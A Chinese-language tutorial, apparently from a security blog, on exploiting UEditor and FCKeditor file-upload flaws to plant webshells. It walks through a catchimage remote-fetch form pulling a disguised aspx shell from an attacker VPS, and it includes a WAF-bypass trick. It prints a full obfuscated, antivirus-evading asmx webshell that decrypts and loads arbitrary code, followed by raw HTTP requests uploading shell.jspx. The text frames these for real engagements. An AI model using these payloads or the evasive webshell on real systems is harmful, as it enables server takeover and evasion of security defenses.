Ueditor 漏洞捡漏
到 github 上下载
https://github.com/fex-team/ueditor
下载完成后把压缩包解压后重命名为 ueditor
,新建一个目录,把 ueditor
放到 test
文件夹下
把 net
目录转化为应用程序
运行过程报错
修改 web.config
,添加 <customErrors mode="Off"/>
修改完成后继续出现报错
在 C:windowstemp
这个文件夹添加 network service
用户的权限即可解决
搭建完成
访问首页,会出现如图 403 的页面
常规的目录扫描
访问 login.html 为简单的登陆页面,这个点是用来混淆视线的,直接跳过
但我们可以看到目录扫描 ueditor 下存在以下页面,可以联想到 ueditor getshell
/ueditor/net/controller.ashx?action=
准备一个 aspx 木马,重命名为 png,并放置到 VPS 上,在该目录下开启 http 服务
python -m SimpleHTTPServer 8080
构造上传表单填入以下地址
<form action="http://192.168.121.189:8081/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
<p>输入web地址: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
在服务器上放置 test.png,表单填入对应的地址
http://x.x.x.x/test.png?.aspx
上传后的路径为
/ueditor/net/upload/image/20221026/6380239109238730544736443.aspx
这时候可能会以为结束了,但是再次访问发现 webshell 不在了
因为我这里设置了一个坑,在该目录下设置了对 aspx 和 ashx 的每隔 20s 的定时删除,但是我们可以上传 asmx
但是如果是默认的 asmx,会直接被 windows defender 干掉
所以这里还需要上传免杀的 asmx webshell
<%@ WebService LanGuagE="C#" Class="govt" %>
public class govt : u0053u0079u0073u0074u0065u006D.Web.u0053u0065u0072u0076u0069u0063u0065u0073.WebService
{
[u0053u0079u0073u0074u0065u006D.Web./*AYvToVqOG*/u0053u0065u0072u0076u0069u0063u0065u0073.WebMethod(EnableU00000053U00000065U00000073U00000073U00000069U0000006FU0000006E = true)]
public string /*pVtVzcOv8Z*/Tas9er(string Tas9er)
{
u0053u0079u0073u0074u0065u006D.Text./*p8YVlgO*/u0053u0074u0072u0069u006Eu0067u0042u0075u0069u006Cu0064u0065u0072 govSCi = new u0053u0079u0073u0074u0065u006D/*RknvY69z3Z*/.Text.u0053u0074u0072u0069u006Eu0067u0042u0075u0069u006Cu0064u0065u0072();
try {
string govI437x9c = u0053u0079u0073u0074u0065u006D.Text.ASCIIU00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.ASCII.GetString(u0053u0079u0073u0074u0065u006D.U00000043U0000006FU0000006EU00000076U00000065U00000072U00000074.U00000046U00000072U0000006FU0000006DU00000042U00000061U00000073U00000065U00000036U00000034U00000053U00000074U00000072U00000069U0000006EU00000067(u0053u0079u0073u0074u0065u006D.Text.ASCIIU00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.ASCII.GetString(u0053u0079u0073u0074u0065u006D.U00000043U0000006FU0000006EU00000076U00000065U00000072U00000074.U00000046U00000072U0000006FU0000006DU00000042U00000061U00000073U00000065U00000036U00000034U00000053U00000074U00000072U00000069U0000006EU00000067("VkdGek9XVnk="))));
string govRRbfsae = "2800b006c42ca583";
string govw4 = u0053u0079u0073u0074u0065u006D./*PUoWgdIT*/u0042u0069u0074u0043u006Fu006Eu0076u0065u0072u0074u0065u0072/*BfH0QWQEe*/.ToString(new u0053u0079u0073u0074u0065u006D.u0053u0065u0063u0075u0072u0069u0074u0079./*n2H*/u0043u0072u0079u0070u0074u006Fu0067u0072u0061u0070u0068u0079./*hpZRU7FTlnvxaX*/U0000004DU00000044U00000035U00000043U00000072U00000079U00000070U00000074U0000006FU00000053U00000065U00000072U00000076U00000069U00000063U00000065U00000050U00000072U0000006FU00000076U00000069U00000064U00000065U00000072()/*OaYl4gLbRQdW*/./*GLYXrw*/ComputeHash/*JBBGQiO8c2ol*/(u0053u0079u0073u0074u0065u006D./*IgRxR9LBNLdyOI*/Text./*RSQ7leSOsyTWLlT*/U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.Default.U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govI437x9c + govRRbfsae)))./*I6sRO*/Replace/*J*/("-", "");
byte[] gov4b0J = /*ZULKaq*/u0053u0079u0073u0074u0065u006D.U00000043U0000006FU0000006EU00000076U00000065U00000072U00000074.U00000046U00000072U0000006FU0000006DU00000042U00000061U00000073U00000065U00000036U00000034U00000053U00000074U00000072U00000069U0000006EU00000067/*x6E7V3q*/(u0053u0079u0073u0074u0065u006D.Web.HttpUtility./*bXFLiBPrPz*/UrlDecode(Tas9er));
gov4b0J = new u0053u0079u0073u0074u0065u006D./*L27*/u0053u0065u0063u0075u0072u0069u0074u0079./*MNwFb6K1UEZlKg*/u0043u0072u0079u0070u0074u006Fu0067u0072u0061u0070u0068u0079.u0052u0069u006Au006Eu0064u0061u0065u006Cu004Du0061u006Eu0061u0067u0065u0064()/*gHR5gB*/.CreateDecryptor/*RGVmPLA*/(/*1Zo6f*/u0053u0079u0073u0074u0065u006D.Text.U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067./*q2*/Default.U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govRRbfsae), u0053u0079u0073u0074u0065u006D.Text.U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.Default./*m6VFD3*/U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govRRbfsae))./*N*/u0054u0072u0061u006Eu0073u0066u006Fu0072u006Du0046u0069u006Eu0061u006Cu0042u006Cu006Fu0063u006B(gov4b0J, 0, gov4b0J.Length);
if (/*PKOt8*/Context./*6Ve6NcYTCUMR*/U00000053U00000065U00000073U00000073U00000069U0000006FU0000006E["payload"] == null)
{ Context.U00000053U00000065U00000073U00000073U00000069U0000006FU0000006E/*7eRBnVsdy9xpn6M*/["payload"] = (u0053u0079u0073u0074u0065u006D./*OzT2D4qE*/U00000052U00000065U00000066U0000006CU00000065U00000063U00000074U00000069U0000006FU0000006E./*LLZ9*/u0041u0073u0073u0065u006Du0062u006Cu0079)typeof(u0053u0079u0073u0074u0065u006D.U00000052U00000065U00000066U0000006CU00000065U00000063U00000074U00000069U0000006FU0000006E.u0041u0073u0073u0065u006Du0062u006Cu0079).GetMethod("Load", new u0053u0079u0073u0074u0065u006D/*I*/.Type[] { typeof(byte[]) }).Invoke(null, new object[] { gov4b0J }); ; }
else { object govuMp04AfvJ0JsnQ = ((u0053u0079u0073u0074u0065u006D.U00000052U00000065U00000066U0000006CU00000065U00000063U00000074U00000069U0000006FU0000006E/*FkIst*/.u0041u0073u0073u0065u006Du0062u006Cu0079/*NYWAs1*/)Context.U00000053U00000065U00000073U00000073U00000069U0000006FU0000006E["payload"]).CreateInstance("LY");
u0053u0079u0073u0074u0065u006D.u0049u004F./*ZEz8kkK8Ubl*/MemoryStream govH7zQ8 = new u0053u0079u0073u0074u0065u006D.u0049u004F.MemoryStream();
govuMp04AfvJ0JsnQ.U00000045U00000071U00000075U00000061U0000006CU00000073(Context);
govuMp04AfvJ0JsnQ.U00000045U00000071U00000075U00000061U0000006CU00000073(govH7zQ8);
govuMp04AfvJ0JsnQ.U00000045U00000071U00000075U00000061U0000006CU00000073(gov4b0J);
govuMp04AfvJ0JsnQ.ToString()/*jp9E9a*/;
byte[] govki9HTZ9d2d = govH7zQ8./*VzzU1VIvbF*/ToArray();
govSCi.U00000041U00000070U00000070U00000065U0000006EU00000064(govw4.u0053u0075u0062su0074u0072u0069u006Eu0067(0, 16));
govSCi.U00000041U00000070U00000070U00000065U0000006EU00000064/*pKfdqlo*/(u0053u0079u0073u0074u0065u006D.U00000043U0000006FU0000006EU00000076U00000065U00000072U00000074./*8VxHKj7lkDZdlH*/ToBase64String/*ZTWCBpuE6m*/(new u0053u0079u0073u0074u0065u006D.u0053u0065u0063u0075u0072u0069u0074u0079.u0043u0072u0079u0070u0074u006Fu0067u0072u0061u0070u0068u0079/*xW4*/.u0052u0069u006Au006Eu0064u0061u0065u006Cu004Du0061u006Eu0061u0067u0065u0064()./*qO*/CreateEncryptor(u0053u0079u0073u0074u0065u006D.Text.U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.Default.U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govRRbfsae), u0053u0079u0073u0074u0065u006D.Text.U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.Default.U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govRRbfsae)).u0054u0072u0061u006Eu0073u0066u006Fu0072u006Du0046u0069u006Eu0061u006Cu0042u006Cu006Fu0063u006B(govki9HTZ9d2d, 0, govki9HTZ9d2d.Length)));
govSCi.U00000041U00000070U00000070U00000065U0000006EU00000064(govw4.u0053u0075u0062su0074u0072u0069u006Eu0067(16)); } }
catch (u0053u0079u0073u0074u0065u006D/*wxc47AGjEiDvg*/.Exception) { }
return govSCi.ToString();
}
}
最终成功 getshell
在实战中还可能会遇到 waf 的拦截
这时候通过中间穿插其他字符有可能绕过
http://x.x.x.x/test.png?.?a?s?p?x
Fckeditor 漏洞捡漏
在应用下访问下面路径,如果状态码为 200
/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
且存在如下界面,不存在的话也可以盲试
POST /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1
Host: 192.168.85.205:8080
Content-Length: 864
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.85.205:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTlvhCuZ9au16UR8X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.85.205:8080/hrms/fckeditor/editor/filemanager/browser/default/frmupload.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryTlvhCuZ9au16UR8X
Content-Disposition: form-data; name="NewFile"; filename="shell.jspx"
Content-Type: application/octet-stream
xxxxxxxxx
------WebKitFormBoundaryTlvhCuZ9au16UR8X--
POST /fckeditor/editor/filemanager/upload/simpleuploader?Type=test1 HTTP/1.1
Host: 192.168.85.205:8080
Content-Length: 864
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.85.205:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybSzSW2Jr2GrbTJAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.85.205:8080/ctop/editor/filemanager/browser/default/frmupload.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarybSzSW2Jr2GrbTJAA
Content-Disposition: form-data; name="NewFile"; filename="shell.jspx"
Content-Type: application/octet-stream
xxxxxxxxx
------WebKitFormBoundarybSzSW2Jr2GrbTJAA--
shell 的链接地址为:
http(s)://x.x.x.x/UserFiles/test1/shell.jspx
暂无评论内容